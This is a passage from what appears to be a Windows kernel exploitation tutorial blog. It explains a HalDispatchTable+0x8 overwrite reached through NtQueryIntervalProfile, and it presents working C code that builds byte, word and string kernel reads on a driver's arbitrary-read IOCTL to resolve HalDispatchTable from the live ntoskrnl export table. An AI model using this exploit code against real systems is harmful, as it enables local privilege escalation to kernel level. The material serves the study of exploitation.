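A value such as 0x3506f8 has bit 20 set, so SMEP is on. A value such as 0x2506f8 has it cleared, which is the state this first version of the exploit relies on.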

HalDispatchTable + 0x8 is the entry commonly used with the NtQueryIntervalProfile trigger path. As explained in the blog here, we can confirm this by disassembling the API.

0: kd> uf nt!NtQueryIntervalProfile
......
nt!NtQueryIntervalProfile+0x3d:
fffff802`1092014d e822000000      call    nt!KeQueryIntervalProfile (fffff802`10920174)
fffff802`10920152 4084ff          test    dil,dil
fffff802`10920155 7412            je      nt!NtQueryIntervalProfile+0x59 (fffff802`10920169)  Branch
......
0: kd> uf nt!KeQueryIntervalProfile
......
nt!KeQueryIntervalProfile+0x1c:
fffff802`10920190 488b05d1084e00  mov     rax,qword ptr [nt!HalDispatchTable+0x8 (fffff802`10e00a68)]
fffff802`10920197 4c8d4c2460      lea     r9,[rsp+60h]
fffff802`1092019c ba18000000      mov     edx,18h
fffff802`109201a1 894c2430        mov     dword ptr [rsp+30h],ecx
fffff802`109201a5 4c8d442430      lea     r8,[rsp+30h]
fffff802`109201aa 8d4ae9          lea     ecx,[rdx-17h]
fffff802`109201ad e82ee8cdff      call    nt!guard_dispatch_icall (fffff802`105fe9e0)
fffff802`109201b2 85c0            test    eax,eax
fffff802`109201b4 7819            js      nt!KeQueryIntervalProfile+0x5b (fffff802`109201cf)  Branch
.......
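The address WinDbg prints for HalDispatchTable+0x8 can be checked by hand from the instruction bytes. The mov at KeQueryIntervalProfile+0x1c is `48 8b 05 d1 08 4e 00`: a 7-byte instruction with a RIP-relative 32-bit displacement of 0x004e08d1. A minimal sketch of the decode, with a helper name of my own choosing:

```cpp
#include <cassert>
#include <cstdint>

// Target of a RIP-relative operand: address of the *next* instruction plus disp32.
constexpr std::uint64_t rip_relative_target(std::uint64_t instrAddress,
                                            std::uint64_t instrLength,
                                            std::int32_t disp32) {
    // The displacement is signed, so sign-extend it before adding.
    return instrAddress + instrLength + static_cast<std::int64_t>(disp32);
}
```

Plugging in fffff802`10920190, a length of 7, and 0x004e08d1 gives fffff802`10e00a68, which matches the debugger. Subtracting 8 puts HalDispatchTable itself at fffff802`10e00a60 for this boot.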

The Cursed GetProcAddress Arc

Okay, I’ll be honest: things got a lot messier here. We could simply hardcode the offset of HalDispatchTable and add it to the NT base, as we did for PsInitialSystemProcess. Instead, I tried (miserably) to resolve the address dynamically from the kernel at runtime.

A lot of the code has already been explained in the previous blogs so to understand those parts, I suggest giving them a read. I’ll just go over the changes.
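One of those changes is worth isolating first. Our primitive moves 8 bytes per call, while PE header fields are 1, 2, or 4 bytes wide, so narrower reads have to be carved out of a QWORD. Here is a minimal sketch of that arithmetic on plain integers, assuming a little-endian machine. The helper names are hypothetical and no driver is involved.

```cpp
#include <cassert>
#include <cstdint>

// Extract the byte at `address` from the aligned 8-byte word that contains it.
// `alignedWord` is the QWORD that was read from (address & ~7).
constexpr std::uint8_t byte_from_qword(std::uint64_t alignedWord, std::uint64_t address) {
    const unsigned shift = static_cast<unsigned>((address & 0x7ULL) * 8);
    return static_cast<std::uint8_t>((alignedWord >> shift) & 0xff);
}

// Assemble a little-endian DWORD from four consecutive bytes (lowest address first).
constexpr std::uint32_t dword_from_bytes(std::uint8_t b0, std::uint8_t b1,
                                         std::uint8_t b2, std::uint8_t b3) {
    return static_cast<std::uint32_t>(b0)
         | (static_cast<std::uint32_t>(b1) << 8)
         | (static_cast<std::uint32_t>(b2) << 16)
         | (static_cast<std::uint32_t>(b3) << 24);
}
```

Reading one byte per IOCTL is slow, but it means a field that straddles an 8-byte boundary needs no special handling: each byte is fetched from whichever aligned QWORD contains it.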

We resolve HalDispatchTable (HDT) with the following helpers:

  
BYTE ReadBYTE(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD alignedAddress = kernelAddress & ~0x7ULL;
    QWORD value = ReadQWORD(hDevice, alignedAddress);

    DWORD shift = (DWORD)((kernelAddress & 0x7ULL) * 8);

    return (BYTE)((value >> shift) & 0xff);
}

WORD ReadWORD(HANDLE hDevice, QWORD kernelAddress)
{
    WORD value = 0;

    value |= (WORD)ReadBYTE(hDevice, kernelAddress);
    value |= (WORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;

    return value;
}

DWORD ReadDWORD(HANDLE hDevice, QWORD kernelAddress)
{
    DWORD value = 0;

    value |= (DWORD)ReadBYTE(hDevice, kernelAddress);
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 2) << 16;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 3) << 24;

    return value;
}

BOOL ReadKernelString(HANDLE hDevice, QWORD kernelAddress, char* buffer, DWORD maxLen)
{
    if (!buffer || maxLen == 0)
    {
        return FALSE;
    }

    for (DWORD i = 0; i < maxLen - 1; i++)
    {
        buffer[i] = (char)ReadBYTE(hDevice, kernelAddress + i);

        if (buffer[i] == '\0')
        {
            return TRUE;
        }
    }

    buffer[maxLen - 1] = '\0';
    return TRUE;
}

QWORD ResolveKernelExport(HANDLE hDevice, QWORD imageBase, const char* targetExport)
{
    WORD mz = ReadWORD(hDevice, imageBase);

    if (mz != 0x5A4D) // MZ
    {
        printf("[-] Invalid DOS header. Expected MZ, got 0x%04x\n", mz);
        return 0;
    }

    DWORD e_lfanew = ReadDWORD(hDevice, imageBase + 0x3c);
    QWORD ntHeaders = imageBase + e_lfanew;

    DWORD peSignature = ReadDWORD(hDevice, ntHeaders);

    if (peSignature != 0x00004550) // PE\0\0
    {
        printf("[-] Invalid PE signature. Got 0x%08lx\n", peSignature);
        return 0;
    }

    QWORD optionalHeader = ntHeaders + 0x18;

    WORD magic = ReadWORD(hDevice, optionalHeader);

    if (magic != 0x20b) // PE32+
    {
        printf("[-] Not a PE32+ image. OptionalHeader.Magic = 0x%04x\n", magic);
        return 0;
    }

    DWORD exportDirectoryRva = ReadDWORD(hDevice, optionalHeader + 0x70);

    if (!exportDirectoryRva)
    {
        printf("[-] Export directory RVA is NULL\n");
        return 0;
    }

    QWORD exportDirectory = imageBase + exportDirectoryRva;

    DWORD numberOfNames = ReadDWORD(hDevice, exportDirectory + 0x18);
    DWORD addressOfFunctionsRva = ReadDWORD(hDevice, exportDirectory + 0x1c);
    DWORD addressOfNamesRva = ReadDWORD(hDevice, exportDirectory + 0x20);
    DWORD addressOfNameOrdinalsRva = ReadDWORD(hDevice, exportDirectory + 0x24);

    QWORD addressOfFunctions = imageBase + addressOfFunctionsRva;
    QWORD addressOfNames = imageBase + addressOfNamesRva;
    QWORD addressOfNameOrdinals = imageBase + addressOfNameOrdinalsRva;

    printf("[+] Export directory:        0x%llx\n", exportDirectory);
    printf("[+] NumberOfNames:           %lu\n", numberOfNames);

    for (DWORD i = 0; i < numberOfNames; i++)
    {
        DWORD nameRva = ReadDWORD(
            hDevice,
            addressOfNames + (i * sizeof(DWORD))
        );

        QWORD nameAddress = imageBase + nameRva;

        char exportName[256] = { 0 };

        ReadKernelString(
            hDevice,
            nameAddress,
            exportName,
            sizeof(exportName)
        );

        if (strcmp(exportName, targetExport) == 0)
        {
            WORD ordinal = ReadWORD(
                hDevice,
                addressOfNameOrdinals + (i * sizeof(WORD))
            );

            DWORD functionRva = ReadDWORD(
                hDevice,
                addressOfFunctions + (ordinal * sizeof(DWORD))
            );

            QWORD functionAddress = imageBase + functionRva;

            printf("[+] Found export:            %s\n", exportName);
            printf("[+] Export ordinal:          %u\n", ordinal);
            printf("[+] Export RVA:              0x%lx\n", functionRva);
            printf("[+] Export address:          0x%llx\n", functionAddress);

            return functionAddress;
        }
    }

    printf("[-] Export not found: %s\n", targetExport);
    return 0;
}

QWORD ResolveHalDispatchTable(HANDLE hDevice, QWORD ntBase)
{
    QWORD halDispatchTable = 0;

    printf("[+] Trying dynamic HalDispatchTable export resolution...\n");

    halDispatchTable = ResolveKernelExport(
        hDevice,
        ntBase,
        "HalDispatchTable"
    );

    if (halDispatchTable)
    {
        printf("[+] Dynamic HalDispatchTable resolution succeeded\n");
        return halDispatchTable;
    }

    printf("[!] Dynamic HalDispatchTable resolution failed\n");
    printf("[!] Falling back to hardcoded WinDBG offset: 0x%llx\n",
        HALDISPATCHTABLE_FALLBACK_OFFSET
    );

    halDispatchTable = ntBase + HALDISPATCHTABLE_FALLBACK_OFFSET;

    printf("[+] Fallback HalDispatchTable: 0x%llx\n", halDispatchTable);

    return halDispatchTable;
}

Reading Kernel Memory One Byte at a Time

Before resolving HalDispatchTable, I needed a way to read different data sizes from kernel memory. My arbitrary read helper gave me 8 bytes at a time through ReadQWORD(), but PE headers are not made only of 8-byte values. Some fields are 1 byte, some are 2 bytes, and many are 4-byte RVAs. So the first step was to build smaller read helpers on top of the 8-byte read primitive.

  
BYTE ReadBYTE(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD alignedAddress = kernelAddress & ~0x7ULL;
    QWORD value = ReadQWORD(hDevice, alignedAddress);

    DWORD shift = (DWORD)((kernelAddress & 0x7ULL) * 8);

    return (BYTE)((value >> shift) & 0xff);
}

ReadBYTE() reads a single byte from an arbitrary kernel address.

This function exists because my primitive reads 8 bytes at once. If I want one byte from address X, I first align the address down to an 8-byte boundary:

  
QWORD alignedAddress = kernelAddress & ~0x7ULL;

For example:

kernelAddress  = fffff802`1020003c
alignedAddress = fffff802`10200038

The mask ~0x7 clears the lower 3 bits of the address. Since 8 bytes equals 2^3, clearing the lower 3 bits rounds the address down to the nearest 8-byte boundary.

Then the function reads the full aligned QWORD:

  
QWORD value = ReadQWORD(hDevice, alignedAddress);

Now we have 8 bytes, but we only want one of them. This line calculates which byte inside the QWORD we need:

  
DWORD shift = (DWORD)((kernelAddress & 0x7ULL) * 8);

kernelAddress & 0x7 gives the offset inside the 8-byte chunk. Multiplying by 8 converts the byte offset into a bit shift.

Finally, the function shifts the wanted byte into the lowest position and masks everything else away:

  
return (BYTE)((value >> shift) & 0xff);

So ReadBYTE() is just a byte extractor built on top of an 8-byte arbitrary read.
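
To see the align-and-shift arithmetic in isolation, here is a minimal user mode sketch. It never touches the driver: fake_memory, mock_read_qword and read_byte are hypothetical stand-ins for kernel memory, ReadQWORD() and ReadBYTE(), and it assumes a little-endian host like the x64 target.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for kernel memory: 16 bytes with known values. */
static const uint8_t fake_memory[16] = {
    0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
    0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff
};

/* Mock of the 8-byte read primitive. "address" is an offset into fake_memory.
   Assumes a little-endian host, like the x64 target in this post. */
static uint64_t mock_read_qword(uint64_t address)
{
    uint64_t value = 0;
    memcpy(&value, &fake_memory[address], sizeof(value));
    return value;
}

/* Same logic as ReadBYTE(): align down, read 8 bytes, shift, mask. */
static uint8_t read_byte(uint64_t address)
{
    uint64_t aligned = address & ~0x7ULL;
    uint64_t value = mock_read_qword(aligned);
    unsigned shift = (unsigned)((address & 0x7ULL) * 8);

    return (uint8_t)((value >> shift) & 0xff);
}
```

With these values, read_byte(12) reads the QWORD at offset 8, shifts it right by 32 bits and returns 0xcc. A side benefit of aligning first is that an aligned 8-byte read can never straddle a page boundary.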

  
WORD ReadWORD(HANDLE hDevice, QWORD kernelAddress)
{
    WORD value = 0;

    value |= (WORD)ReadBYTE(hDevice, kernelAddress);
    value |= (WORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;

    return value;
}

ReadWORD() reads 2 bytes from kernel memory.

It calls ReadBYTE() twice:

  
ReadBYTE(hDevice, kernelAddress)
ReadBYTE(hDevice, kernelAddress + 1)

Then it rebuilds the 16-bit value manually.

Windows on x64 is little-endian, which means the least significant byte appears first in memory. So if memory contains:

4D 5A

the actual WORD value is:

0x5A4D

That matters because the DOS header signature for a PE file is MZ, which appears as:

'M' = 0x4D
'Z' = 0x5A

but when interpreted as a little-endian WORD, it becomes:

0x5A4D

That is why later the code checks:

  
if (mz != 0x5A4D)

  
DWORD ReadDWORD(HANDLE hDevice, QWORD kernelAddress)
{
    DWORD value = 0;

    value |= (DWORD)ReadBYTE(hDevice, kernelAddress);
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 2) << 16;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 3) << 24;

    return value;
}

ReadDWORD() reads 4 bytes from kernel memory.

This is needed because PE headers use many 32-bit fields. For example:

e_lfanew
RVA values
NumberOfNames
AddressOfFunctions
AddressOfNames
AddressOfNameOrdinals

All of those are DWORD-sized fields.

Just like ReadWORD(), this function reads bytes one by one and rebuilds the value in little-endian order.

For example, if memory contains:

60 0A C0 00

ReadDWORD() reconstructs it as:

0x00C00A60

That is exactly the kind of value we expect for an RVA like HalDispatchTable.
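
One cost of the byte-by-byte approach is that every ReadDWORD() triggers four IOCTLs. The sketch below is a possible variation, not what the exploit code in this post does: it pulls the DWORD out of a single aligned QWORD and only issues a second read when the value straddles two QWORDs. The names fake_memory, mock_read_qword, primitive_calls and read_dword_fast are hypothetical, and a little-endian host is assumed.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for kernel memory. */
static const uint8_t fake_memory[16] = {
    0x4d, 0x5a, 0x90, 0x00, 0x60, 0x0a, 0xc0, 0x00,
    0x78, 0x56, 0x34, 0x12, 0x00, 0x00, 0x00, 0x00
};

/* Counts how often the mocked read primitive is used. */
static unsigned primitive_calls = 0;

/* Mock of the 8-byte read primitive (little-endian host assumed). */
static uint64_t mock_read_qword(uint64_t address)
{
    uint64_t value = 0;
    primitive_calls++;
    memcpy(&value, &fake_memory[address], sizeof(value));
    return value;
}

/* Read 4 bytes with one aligned QWORD read, or two if the DWORD straddles. */
static uint32_t read_dword_fast(uint64_t address)
{
    uint64_t aligned = address & ~0x7ULL;
    unsigned offset = (unsigned)(address & 0x7ULL);
    uint64_t low = mock_read_qword(aligned) >> (offset * 8);

    if (offset > 4)
    {
        /* The upper bytes live in the next QWORD. */
        uint64_t high = mock_read_qword(aligned + 8);
        low |= high << ((8 - offset) * 8);
    }

    return (uint32_t)low;
}
```

Reading at offset 4 returns 0x00C00A60 with a single primitive call, while reading at offset 6 needs two calls because the value crosses into the next QWORD.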

  
BOOL ReadKernelString(HANDLE hDevice, QWORD kernelAddress, char* buffer, DWORD maxLen)
{
    if (!buffer || maxLen == 0)
    {
        return FALSE;
    }

    for (DWORD i = 0; i < maxLen - 1; i++)
    {
        buffer[i] = (char)ReadBYTE(hDevice, kernelAddress + i);

        if (buffer[i] == '\0')
        {
            return TRUE;
        }
    }

    buffer[maxLen - 1] = '\0';
    return TRUE;
}

ReadKernelString() reads a NULL-terminated ASCII string from kernel memory.

This is needed because the PE export table does not store export names directly inside the main structure. Instead, it stores RVAs that point to strings such as:

HalDispatchTable
KeBugCheck
PsInitialSystemProcess

The function starts reading one byte at a time from the supplied kernel address:

  
buffer[i] = (char)ReadBYTE(hDevice, kernelAddress + i);

It stops when it sees a NULL byte:

  
if (buffer[i] == '\0')

This means the string is complete.

The function also enforces a maximum length:

  
for (DWORD i = 0; i < maxLen - 1; i++)

This prevents the function from reading forever if the target address does not contain a valid NULL-terminated string.

Finally, it manually NULL-terminates the buffer:

  
buffer[maxLen - 1] = '\0';

This is a safety measure so the buffer is still a valid C string even if the loop reaches the maximum length.
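
Note that ReadKernelString() returns TRUE even when the name was cut off at the maximum length. If the caller should be able to tell the difference, one option is a variant that reports truncation. This is a sketch under assumptions: fake_memory, mock_read_byte and read_string_checked are hypothetical names, and the mock reads from a local string instead of the kernel.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the bytes at the export name address. */
static const char fake_memory[] = "HalDispatchTable";

/* Mock of ReadBYTE(). "address" is an offset into fake_memory. */
static uint8_t mock_read_byte(uint64_t address)
{
    return (uint8_t)fake_memory[address];
}

/* Returns 1 if the terminator was found, 0 if the string was truncated
   (or the arguments were invalid). The buffer is always terminated. */
static int read_string_checked(uint64_t address, char *buffer, size_t max_len)
{
    if (!buffer || max_len == 0)
    {
        return 0;
    }

    for (size_t i = 0; i < max_len - 1; i++)
    {
        buffer[i] = (char)mock_read_byte(address + i);

        if (buffer[i] == '\0')
        {
            return 1;
        }
    }

    buffer[max_len - 1] = '\0';
    return 0;
}
```

With a 4-byte buffer the function stores "Hal" and returns 0, so a caller could skip the comparison instead of comparing against a partial name.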

Resolving an Export from the Live Kernel Image

The main resolver is ResolveKernelExport().

  
QWORD ResolveKernelExport(HANDLE hDevice, QWORD imageBase, const char* targetExport)

This function manually parses the PE export table of a loaded kernel image and searches for a specific exported symbol.

In this exploit, the target is:

"HalDispatchTable"

The important part is that imageBase is not a user-mode copy of ntoskrnl.exe. It is the real loaded kernel base returned by EnumDeviceDrivers().

So instead of doing this:

Load ntoskrnl.exe from disk
GetProcAddress("HalDispatchTable")
Calculate offset
Add offset to kernel base

this function does this:

Read live ntoskrnl.exe from kernel memory
Parse its PE headers manually
Walk its export table
Find "HalDispatchTable"
Return the live kernel address

In simple terms, it is a homemade GetProcAddress() that works against kernel memory.

Checking the DOS Header:

  
WORD mz = ReadWORD(hDevice, imageBase);

if (mz != 0x5A4D) // MZ
{
    printf("[-] Invalid DOS header. Expected MZ, got 0x%04x\n", mz);
    return 0;
}

Every PE file starts with a DOS header. The first two bytes are:

MZ

In memory, that is:

4D 5A

As a little-endian WORD, this becomes:

0x5A4D

So this check confirms that the kernel base we found actually points to a PE image.

If this fails, then either the base address is wrong or the read primitive is not working correctly.

Finding the NT Headers:

  
DWORD e_lfanew = ReadDWORD(hDevice, imageBase + 0x3c);
QWORD ntHeaders = imageBase + e_lfanew;

Inside the DOS header, offset 0x3c contains a field called e_lfanew.

e_lfanew is the offset from the image base to the real PE headers.

So the code reads:

  
imageBase + 0x3c

and then calculates:

  
ntHeaders = imageBase + e_lfanew;

This gives us the address of the NT headers in the live kernel image.

Checking the PE Signature:

  
DWORD peSignature = ReadDWORD(hDevice, ntHeaders);

if (peSignature != 0x00004550) // PE\0\0
{
    printf("[-] Invalid PE signature. Got 0x%08lx\n", peSignature);
    return 0;
}

The NT headers start with the PE signature:

PE\0\0

In hex, that is:

50 45 00 00

As a little-endian DWORD, it becomes:

0x00004550

This confirms that the address calculated from e_lfanew really points to the NT headers.

Locating the Optional Header:

  
QWORD optionalHeader = ntHeaders + 0x18;

The PE NT headers are laid out like this:

IMAGE_NT_HEADERS64
+0x00  Signature        4 bytes
+0x04  FileHeader       20 bytes / 0x14
+0x18  OptionalHeader

So ntHeaders + 0x18 lands at the Optional Header.

Despite the name, the Optional Header is not really optional for normal PE files. It contains important information such as image layout, entry point, image base, and data directories.
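
If you do not trust the 0x18, you can let the compiler do the arithmetic. The sketch below mirrors only the fields needed for the check using fixed-width types. The type and function names are hypothetical; the field names follow the public PE layout.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified mirror of IMAGE_FILE_HEADER (20 bytes). */
typedef struct {
    uint16_t Machine;
    uint16_t NumberOfSections;
    uint32_t TimeDateStamp;
    uint32_t PointerToSymbolTable;
    uint32_t NumberOfSymbols;
    uint16_t SizeOfOptionalHeader;
    uint16_t Characteristics;
} file_header_t;

/* Only the first Optional Header field is needed for this check. */
typedef struct {
    uint16_t Magic;
} optional_header_prefix_t;

/* Signature, then FileHeader, then the start of the Optional Header. */
typedef struct {
    uint32_t Signature;
    file_header_t FileHeader;
    optional_header_prefix_t OptionalHeader;
} nt_headers_prefix_t;

static size_t file_header_size(void)
{
    return sizeof(file_header_t);
}

static size_t optional_header_offset(void)
{
    return offsetof(nt_headers_prefix_t, OptionalHeader);
}
```

Here file_header_size() evaluates to 20 and optional_header_offset() to 0x18. On a Windows build with the SDK headers, offsetof(IMAGE_NT_HEADERS64, OptionalHeader) should report the same value.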

Verifying PE32+:

  
WORD magic = ReadWORD(hDevice, optionalHeader);

if (magic != 0x20b) // PE32+
{
    printf("[-] Not a PE32+ image. OptionalHeader.Magic = 0x%04x\n", magic);
    return 0;
}

The first field in the Optional Header is Magic.

For 64-bit PE images, this value is:

0x20b

This is called PE32+.

Since this exploit is running against Windows 10 x64, ntoskrnl.exe should be a PE32+ image. If this check fails, then either the parser is pointed at the wrong memory or the target is not a 64-bit PE image.

Reading the Export Directory RVA:

  
DWORD exportDirectoryRva = ReadDWORD(hDevice, optionalHeader + 0x70);

if (!exportDirectoryRva)
{
    printf("[-] Export directory RVA is NULL\n");
    return 0;
}

The Optional Header contains an array called the Data Directory. The first entry in that array points to the Export Directory.

For PE32+ images, the Export Directory RVA is located at:

OptionalHeader + 0x70

This value is an RVA, not a full virtual address.

An RVA is a Relative Virtual Address. It is relative to the image base.

So if the export directory RVA is:

0x1334000

and the kernel image base is:

fffff802`10200000

then the real address is:

fffff802`10200000 + 0x1334000

Converting Export Directory RVA to VA:

  
QWORD exportDirectory = imageBase + exportDirectoryRva;

This converts the RVA into a real kernel virtual address.

At this point, exportDirectory points to an IMAGE_EXPORT_DIRECTORY structure inside the live kernel image.
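
The conversion itself is a single addition, shown here with the example numbers from above. The bounds check is an extra that the resolver in this post does not perform: it assumes you also read SizeOfImage (at OptionalHeader + 0x38) and want to reject RVAs that fall outside the image. The function names are hypothetical.

```c
#include <stdint.h>

/* Extra sanity check (not in the post's resolver): an RVA should be
   non-zero and smaller than the image size from the Optional Header. */
static int rva_is_inside_image(uint32_t rva, uint32_t size_of_image)
{
    return rva != 0 && rva < size_of_image;
}

/* RVA -> VA: add the RVA to the base address of the loaded image. */
static uint64_t rva_to_va(uint64_t image_base, uint32_t rva)
{
    return image_base + rva;
}
```

For the example values, rva_to_va(0xfffff80210200000, 0x1334000) gives fffff802`11534000.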

Reading Export Directory Fields:

  
DWORD numberOfNames = ReadDWORD(hDevice, exportDirectory + 0x18);
DWORD addressOfFunctionsRva = ReadDWORD(hDevice, exportDirectory + 0x1c);
DWORD addressOfNamesRva = ReadDWORD(hDevice, exportDirectory + 0x20);
DWORD addressOfNameOrdinalsRva = ReadDWORD(hDevice, exportDirectory + 0x24);

These fields come from the IMAGE_EXPORT_DIRECTORY structure.

The important ones are:

NumberOfNames
AddressOfFunctions
AddressOfNames
AddressOfNameOrdinals

NumberOfNames tells us how many named exports exist.

AddressOfNames is an RVA to an array of RVAs. Each entry points to an export name string.

AddressOfNameOrdinals is an RVA to an array of ordinals. Each ordinal maps a name to a function-table index.

AddressOfFunctions is an RVA to an array of function RVAs.

Together, these three arrays let us go from:

export name -> ordinal -> function RVA -> function address

That is exactly what GetProcAddress() normally does for us.
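
The offsets 0x18, 0x1c, 0x20 and 0x24 used above fall out of the structure layout. As a quick sanity check, here is a mirror of IMAGE_EXPORT_DIRECTORY built from fixed-width types. The type name export_directory_t and the helper functions are hypothetical; the field names follow the public PE layout.

```c
#include <stddef.h>
#include <stdint.h>

/* Mirror of IMAGE_EXPORT_DIRECTORY using fixed-width types. */
typedef struct {
    uint32_t Characteristics;        /* +0x00 */
    uint32_t TimeDateStamp;          /* +0x04 */
    uint16_t MajorVersion;           /* +0x08 */
    uint16_t MinorVersion;           /* +0x0a */
    uint32_t Name;                   /* +0x0c */
    uint32_t Base;                   /* +0x10 */
    uint32_t NumberOfFunctions;      /* +0x14 */
    uint32_t NumberOfNames;          /* +0x18 */
    uint32_t AddressOfFunctions;     /* +0x1c */
    uint32_t AddressOfNames;         /* +0x20 */
    uint32_t AddressOfNameOrdinals;  /* +0x24 */
} export_directory_t;

static size_t off_number_of_names(void)
{
    return offsetof(export_directory_t, NumberOfNames);
}

static size_t off_functions(void)
{
    return offsetof(export_directory_t, AddressOfFunctions);
}

static size_t off_names(void)
{
    return offsetof(export_directory_t, AddressOfNames);
}

static size_t off_name_ordinals(void)
{
    return offsetof(export_directory_t, AddressOfNameOrdinals);
}
```

One detail worth knowing: the values stored in the AddressOfNameOrdinals array are already zero-based indexes into AddressOfFunctions, so the Base field does not need to be added or subtracted when resolving by name.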

Converting Export Arrays to Kernel Addresses:

  
QWORD addressOfFunctions = imageBase + addressOfFunctionsRva;
QWORD addressOfNames = imageBase + addressOfNamesRva;
QWORD addressOfNameOrdinals = imageBase + addressOfNameOrdinalsRva;

Again, these fields are RVAs, so they need to be converted to real addresses by adding the image base.

After this, the resolver has three live kernel addresses:

addressOfNames         -> array of export-name RVAs
addressOfNameOrdinals  -> array of WORD ordinals
addressOfFunctions     -> array of function RVAs

Walking the Export Names:

  
for (DWORD i = 0; i < numberOfNames; i++)
{
    DWORD nameRva = ReadDWORD(
        hDevice,
        addressOfNames + (i * sizeof(DWORD))
    );

    QWORD nameAddress = imageBase + nameRva;

    char exportName[256] = { 0 };

    ReadKernelString(
        hDevice,
        nameAddress,
        exportName,
        sizeof(exportName)
    );

This loop walks every named export.

Each entry in AddressOfNames is a DWORD-sized RVA. So for each index i, the code reads:

  
addressOfNames + (i * sizeof(DWORD))

That gives the RVA of the export name string.

Then it converts that RVA into a real address:

  
QWORD nameAddress = imageBase + nameRva;

Then it reads the string from kernel memory:

  
ReadKernelString(hDevice, nameAddress, exportName, sizeof(exportName));

At this point, exportName might contain something like:

HalDispatchTable
KeBugCheck
PsInitialSystemProcess

Comparing the Export Name:

  
if (strcmp(exportName, targetExport) == 0)

This checks whether the current export name matches the symbol we want.

In this exploit, the call is:

  
ResolveKernelExport(hDevice, ntBase, "HalDispatchTable")

So the loop keeps going until it finds:

HalDispatchTable

Resolving Name to Ordinal:

  
WORD ordinal = ReadWORD(
    hDevice,
    addressOfNameOrdinals + (i * sizeof(WORD))
);

The export name array does not directly index the function address array.

Instead, the export name index maps to an ordinal entry.

So once we find the right name at index i, we read the matching ordinal from:

AddressOfNameOrdinals[i]

This ordinal is then used as an index into the function RVA array.

Resolving Ordinal to Function RVA:

  
DWORD functionRva = ReadDWORD(
    hDevice,
    addressOfFunctions + (ordinal * sizeof(DWORD))
);

Now the code uses the ordinal as an index into AddressOfFunctions.

This gives the RVA of the actual exported symbol.

For HalDispatchTable, my output showed:

Export RVA: 0xc00a60

That means HalDispatchTable lives at:

ntBase + 0xc00a60

Converting Function RVA to Kernel Address:

  
QWORD functionAddress = imageBase + functionRva;

This converts the function/symbol RVA into a real live kernel address.
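
To test the whole walk without a kernel (or a bluescreen), the same steps can be run against a tiny fake image in a user mode buffer. This is a sketch under assumptions: the image array, its layout, the second export "Alpha" and every helper name are made up for illustration, and the buffer is trusted, so there are no bounds checks. Only the offsets match the real PE32+ format.

```c
#include <stdint.h>
#include <string.h>

#define IMAGE_SIZE 0x300

/* Hypothetical fake module. Offset 0 plays the role of the image base. */
static uint8_t image[IMAGE_SIZE];

static void put16(uint32_t off, uint16_t v) { memcpy(&image[off], &v, sizeof(v)); }
static void put32(uint32_t off, uint32_t v) { memcpy(&image[off], &v, sizeof(v)); }
static uint16_t get16(uint32_t off) { uint16_t v; memcpy(&v, &image[off], sizeof(v)); return v; }
static uint32_t get32(uint32_t off) { uint32_t v; memcpy(&v, &image[off], sizeof(v)); return v; }

/* Lay out a minimal fake PE32+ image with two named exports. */
static void build_fake_image(void)
{
    memset(image, 0, sizeof(image));
    put16(0x00, 0x5A4D);               /* "MZ" */
    put32(0x3c, 0x80);                 /* e_lfanew */
    put32(0x80, 0x00004550);           /* "PE\0\0" */
    put16(0x80 + 0x18, 0x20b);         /* OptionalHeader.Magic = PE32+ */
    put32(0x80 + 0x18 + 0x70, 0x200);  /* export directory RVA */

    put32(0x200 + 0x18, 2);            /* NumberOfNames */
    put32(0x200 + 0x1c, 0x230);        /* AddressOfFunctions */
    put32(0x200 + 0x20, 0x240);        /* AddressOfNames */
    put32(0x200 + 0x24, 0x250);        /* AddressOfNameOrdinals */

    put32(0x230, 0x00C00A60);          /* functions[0], an arbitrary example RVA */
    put32(0x234, 0x00001000);          /* functions[1] */
    put32(0x240, 0x260);               /* names[0] -> "Alpha" */
    put32(0x244, 0x270);               /* names[1] -> "HalDispatchTable" */
    put16(0x250, 1);                   /* "Alpha" -> functions[1] */
    put16(0x252, 0);                   /* "HalDispatchTable" -> functions[0] */
    memcpy(&image[0x260], "Alpha", 6);
    memcpy(&image[0x270], "HalDispatchTable", 17);
}

/* Same walk as ResolveKernelExport(), returning the export RVA (0 if absent). */
static uint32_t resolve_export_rva(const char *target)
{
    if (get16(0) != 0x5A4D) return 0;

    uint32_t nt = get32(0x3c);
    if (get32(nt) != 0x00004550) return 0;

    uint32_t opt = nt + 0x18;
    if (get16(opt) != 0x20b) return 0;

    uint32_t dir = get32(opt + 0x70);
    if (!dir) return 0;

    uint32_t count = get32(dir + 0x18);
    uint32_t functions = get32(dir + 0x1c);
    uint32_t names = get32(dir + 0x20);
    uint32_t ordinals = get32(dir + 0x24);

    for (uint32_t i = 0; i < count; i++)
    {
        const char *name = (const char *)&image[get32(names + i * 4)];

        if (strcmp(name, target) == 0)
        {
            uint16_t ordinal = get16(ordinals + i * 2);
            return get32(functions + ordinal * 4);
        }
    }

    return 0;
}
```

The two exports are deliberately cross-wired: the name at index 1 maps to function slot 0. A resolver that skipped the ordinal array and indexed AddressOfFunctions with the name index would return the wrong RVA here.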

Resolving HalDispatchTable with a Fallback:

  
QWORD ResolveHalDispatchTable(HANDLE hDevice, QWORD ntBase)
{
    QWORD halDispatchTable = 0;

    printf("[+] Trying dynamic HalDispatchTable export resolution...\n");

    halDispatchTable = ResolveKernelExport(
        hDevice,
        ntBase,
        "HalDispatchTable"
    );

    if (halDispatchTable)
    {
        printf("[+] Dynamic HalDispatchTable resolution succeeded\n");
        return halDispatchTable;
    }

    printf("[!] Dynamic HalDispatchTable resolution failed\n");
    printf("[!] Falling back to hardcoded WinDBG offset: 0x%llx\n",
        HALDISPATCHTABLE_FALLBACK_OFFSET
    );

